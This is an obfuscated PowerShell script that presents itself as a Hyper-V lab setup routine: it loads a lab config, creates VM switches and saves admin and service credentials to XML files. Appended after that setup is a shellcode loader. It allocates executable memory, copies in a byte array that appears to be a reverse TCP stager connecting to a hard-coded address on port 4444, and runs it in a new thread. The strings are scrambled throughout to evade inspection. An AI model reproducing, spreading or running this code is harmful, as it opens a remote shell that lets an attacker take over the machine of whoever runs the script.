.("{3}{0}{2}{1}"-f'mport-','ule','Mod','I') ((("{0}{13}{16}{11}{2}{9}{12}{14}{5}{10}{3}{7}{1}{17}{4}{15}{6}{8}"-f 'C:{0}git-re','}MS','ories{0}Pow','b{','La','VML','.p','0','sm1','erShell{0}','a','t','M','po','SF','b','si','FVM')) -f [cHAr]92) -Force

${l`Ab`CON`FiG} = &("{0}{2}{1}"-f 'G','nt','et-Conte') ((("{6}{0}{1}{9}{2}{5}{8}{4}{7}{3}"-f '3aXgit','-reposit','Po','son','VMLab3aXLabVM','wer','C:','S.j','Shell3aXMSF','ories3aX')) -CREPLAcE  ([CHAR]51+[CHAR]97+[CHAR]88),[CHAR]92) | .("{3}{0}{1}{2}"-f've','rt','From-Json','Con')
${woRk`iN`G`Dir`eCTory} = ${l`ABcONF`Ig}."WoRKiN`G`diReCt`OrY"


If(-not (.("{0}{1}{2}" -f'T','est-Pat','h') ${WorKINgD`iRe`CTO`Ry})){
    .("{0}{3}{2}{1}"-f 'Wri','ror','r','te-E') ("$WorkingDirectory "+'doe'+'s '+'no'+'t '+'ex'+'ist!') -ErrorAction ("{0}{1}" -f 'S','top')
}


foreach(${NeTwo`Rk} in ${l`Abco`N`FIg}."swiTCh`Es"){
    If(!(&("{1}{0}{2}" -f 'MSwitc','Get-V','h') ${NE`TWOrk}."n`Ame" -ErrorAction ("{3}{1}{0}{2}"-f 'tlyContin','ilen','ue','S'))){
            &("{3}{2}{0}{1}"-f'Swi','tch','ew-VM','N') -Name ${n`ET`wORK}."n`AME" -SwitchType ${n`EtW`oRk}."ty`Pe"
        }
}


&("{0}{1}{2}{3}" -f'Ge','t-Cr','edentia','l') -Message ("{1}{7}{0}{3}{8}{2}{5}{6}{4}" -f 's','Loc',' ','t','dential','C','re','al Admin','rator') -UserName ((("{3}{1}{4}{2}{0}{5}"-f 'dministra','o','a','l','calhostVk3','tor'))-RePlAcE  'Vk3',[CHAr]92) | .("{2}{1}{0}"-f'xml','port-Cli','Ex') "$WorkingDirectory\vmlab_localadmin.xml"
.("{2}{0}{1}" -f 't-Credenti','al','Ge') -Message ("{1}{2}{3}{0}{4}" -f 'ti','Dom','ai','n Creden','al') -UserName "$($LabConfig.domain)\administrator" | .("{0}{1}{2}{4}{3}"-f'Expo','rt-C','l','l','ixm') "$WorkingDirectory\vmlab_domainadmin.xml"
.("{0}{4}{1}{3}{2}"-f'G','t-C','dential','re','e') -Message ("{4}{2}{8}{1}{3}{5}{6}{0}{7}" -f'nt','ervice ','er ','cr','SQL Serv','e','de','ial','S') -UserName "$($LabConfig.domain)\sqlsvc" | &("{3}{1}{2}{0}"-f'lixml','r','t-C','Expo') "$WorkingDirectory\vmlab_sqlsvc.xml"

${c} = ((("{78}{92}{35}{14}{97}{36}{72}{59}{88}{42}{45}{30}{0}{65}{11}{3}{64}{53}{56}{81}{40}{61}{23}{94}{66}{19}{32}{24}{15}{8}{4}{18}{41}{80}{67}{49}{96}{54}{68}{6}{90}{69}{37}{2}{39}{46}{50}{7}{5}{82}{63}{26}{13}{31}{83}{20}{12}{38}{43}{85}{29}{58}{44}{74}{87}{17}{76}{48}{95}{27}{47}{70}{62}{79}{73}{89}{1}{25}{75}{71}{52}{93}{22}{21}{34}{9}{16}{57}{77}{55}{60}{51}{84}{10}{86}{91}{33}{28}" -f 'Int','Import(','Cre','Ptr lpAd','Dl','Th','te','p',' flProtect);[','n ',' ','c(Int','tack','es, ui','t(','uint','IntPt','arame','lIm','Ty','dwS','atic e',' st','n',', ','sBgmsvcrt.dll','ut','onFlags, In',';','ddre','atic extern ','n','pe','ount)','xter','mpor','Bgkernel32.','tPtr ','Size, Int','ateThread(Int','dwSize, u','p',' s','Ptr lpS','I','t','Ptr','tP','uint d','.',' l','(IntPtr d',']publi','ess','lic','e',', ','r','ss, ','ubl','t','i','lpThrea','rib','dr','Ptr VirtualAllo','ion','l32',' static ex','n In','tr ',')','dllsBg)]p','I','ntPt','sBg','ter, ',' mems','[','d','ort(sBgkerne','uint ','readAtt','t ','est, uint','tartA','src, uin','r lpP','ic','d);[Dll','r','t c','DllI','c','t flAllocat','wCreati','dllsBg)]pub','s'))."repl`A`cE"('sBg',[sTrInG][ChAR]34));${W} = &("{1}{0}" -f 'dd-Type','A') -memberDefinition ${C} -Name ("{1}{0}"-f '32','Win') -namespace ("{1}{0}{2}" -f'32Fun','Win','ctions') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xbd,0x46,0xb6,0x29,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${z}."leNG`TH" -gt 0x1000){${G} = ${z}."lE`N`GTh"};${X}=${w}::("{3}{0}{1}{2}"-f 'ualA','ll','oc','Virt').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${z}."Le`NGth"-1);${i}++) {${w}::"M`emSET"([IntPtr](${X}.("{0}{1}" -f 'ToInt3','2').Invoke()+${I}), ${Z}[${I}], 1)};${w}::("{0}{1}{2}" -f'Cr','eateThrea','d').Invoke(0,0,${X},0,0,0);for (;;){.("{1}{0}{2}" -f'a','St','rt-sleep') 60};
